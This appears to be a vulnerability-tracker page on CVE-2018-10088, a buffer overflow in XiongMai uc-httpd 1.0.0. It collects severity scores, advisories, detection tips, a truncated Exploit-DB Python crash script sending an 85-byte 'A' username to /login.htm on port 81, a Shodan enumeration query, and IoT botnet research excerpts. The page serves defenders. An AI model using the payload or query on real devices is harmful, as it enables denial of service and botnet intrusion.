CVE-2018-10088
published 2018-06-08CVE-2018-10088: Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
PriorityP180critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
40.39%
98.5th percentile
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xiongmaitech | mbd6304t_firmware | — | — |
| xiongmaitech | nbd6808t-pl_firmware | — | — |
| xiongmaitech | uc-httpd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation attempts by matching HTTP POST requests to /login.htm with an oversized 'username' parameter (85+ 'A' characters) on TCP port 81, targeting XiongMai uc-httpd devices. ↗
- →Identify vulnerable XiongMai uc-httpd 1.0.0 hosts by checking for the 'uc-httpd' string in the HTTP Server response header, version <= 1.0.0. ↗
- →Use Shodan query cpe:"cpe:2.3:a:xiongmaitech:uc-httpd" to enumerate internet-exposed vulnerable devices. ↗
- →The overflow is triggered via a 85-byte 'A' pattern in the username POST parameter; monitor for abnormally long username fields in POST requests to /login.htm. ↗
- ·The exploit proof-of-concept targets TCP port 81 specifically as tested on KKMoon DVR hardware; actual deployment port may vary across Xiongmai device models. ↗
- ·CVE-2018-10088 has unspecified impact and attack vectors per NVD; the exploit-db PoC demonstrates a crash/DoS condition but full RCE has not been publicly confirmed for this specific CVE. ↗
- ·This CVE is distinct from CVE-2017-16725 and CVE-2022-45460, though all three affect Xiongmai HTTP server components; detection rules should not conflate them. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pm7h-vr37-wmc9: Multiple Xiongmai NVR devices, including MBD6304T V4
ghsa_unreviewed·2023-03-29·CVSS 9.8
CVE-2022-45460 [CRITICAL] CWE-787 GHSA-pm7h-vr37-wmc9: Multiple Xiongmai NVR devices, including MBD6304T V4
Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow an unauthenticated and remote user to exploit a stack-based buffer overflow and crash the web server, resulting in a system reboot. An unauthenticated and remote attacker can execute arbitrary code by sending a crafted HTTP request that triggers the overflow condition via a long URI passed to a sprintf call. NOTE: this is different than CVE-2018-10088, but this may overlap CVE-2017-16725.
GHSA
GHSA-3h69-fjjv-586m: Buffer overflow in XiongMai uc-httpd 1
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2018-10088 [CRITICAL] CWE-119 GHSA-3h69-fjjv-586m: Buffer overflow in XiongMai uc-httpd 1
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
VulnCheck
xiongmaitech uc-httpd Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2018·CVSS 9.8
CVE-2018-10088 [CRITICAL] xiongmaitech uc-httpd Improper Restriction of Operations within the Bounds of a Memory Buffer
xiongmaitech uc-httpd Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
Affected: xiongmaitech uc-httpd
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cybersecurity.att.com/blogs/la
No detection rules found.
Exploit-DB
XiongMai uc-httpd 1.0.0 - Buffer Overflow
exploitdb·2018-06-08·CVSS 9.8
CVE-2018-10088 [CRITICAL] XiongMai uc-httpd 1.0.0 - Buffer Overflow
XiongMai uc-httpd 1.0.0 - Buffer Overflow
---
# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow
# Date: 2018-06-08
# Exploit Author: Andrew Watson
# Software Version: XiongMai uc-httpd 1.0.0
# Vendor Homepage: http://www.xiongmaitech.com/en/
# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
# CVE ID: CVE-2018-10088
# DISCLAIMER: This proof of concept is provided for educational purposes only!
#!/usr/bin/python
import socket
import sys
payload="A" * 85
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
if len(sys.argv) \n"
sys.exit()
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],81))
s.send('POST /login.htm H
Nuclei
XiongMai uc-httpd 1.0.0 - Buffer Overflow
nuclei·CVSS 9.8
CVE-2018-10088 [CRITICAL] XiongMai uc-httpd 1.0.0 - Buffer Overflow
XiongMai uc-httpd 1.0.0 - Buffer Overflow
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
Template:
id: CVE-2018-10088
info:
name: XiongMai uc-httpd 1.0.0 - Buffer Overflow
author: 0x_Akoko
severity: critical
description: |
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
impact: |
Potential for remote code execution or denial of service when successfully exploited.
remediation: |
Update to the latest version of uc-httpd or apply security patches provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-10088
- https://www.exploit-db.com/exploits/44864
- https://github.com/bitfu/uc-httpd-1.0.0-buffe
Fortinet
The Ghosts of Mirai | FortiGuard Labs
blogs_fortinet·2021-06-24
The Ghosts of Mirai | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Ghosts of Mirai
By David Maciejak and Joie Salvio | June 24, 2021
FortiGuard Labs Threat Research Report
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
It has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same.
IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. They also seek
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
Mikhail Kuzin
Yaroslav Shmelev
Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
- Mikhail Kuzin
- Yaroslav Shmelev
- Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our hone
2018-06-08
Published
Exploited in the wild